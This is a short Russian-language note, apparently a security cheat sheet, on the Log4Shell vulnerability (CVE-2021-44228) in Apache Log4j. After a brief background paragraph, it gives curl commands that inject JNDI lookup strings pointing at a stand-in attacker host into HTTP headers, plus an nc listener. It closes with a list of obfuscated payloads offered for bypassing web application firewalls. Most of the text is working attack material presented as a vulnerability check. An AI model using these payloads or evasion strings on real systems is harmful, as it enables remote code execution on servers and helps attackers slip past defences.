
CVE-2021-44228
5 декабря 2021 года Apache выявила уязвимость (позже идентифицированную как CVE-2021-44228) в широко используемой службе ведения журналов Log4j. Эта уязвимость, также известная как Log4shell, позволяет злоумышленникам получить полный контроль над уязвимыми серверами, обеспечивая неавторизованное удаленное выполнение кода, если пользователь запускает приложение, использующее библиотеку ведения журналов Java. Log4j широко интегрирован в множество сред DevOps, корпоративных ИТ-систем, а также в программное обеспечение вендоров и облачные продукты.
Выполните следующую команду на вредоносном удаленном хосте, чтобы проверить, уязвим ли ваш сервер для эксплойта Log4j
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
Другие варианты, включающие HTTP-POST запрос, также могут быть использованы для проверки на уязвимость
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
Для обхода веб-брандмауэра (WAF):
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}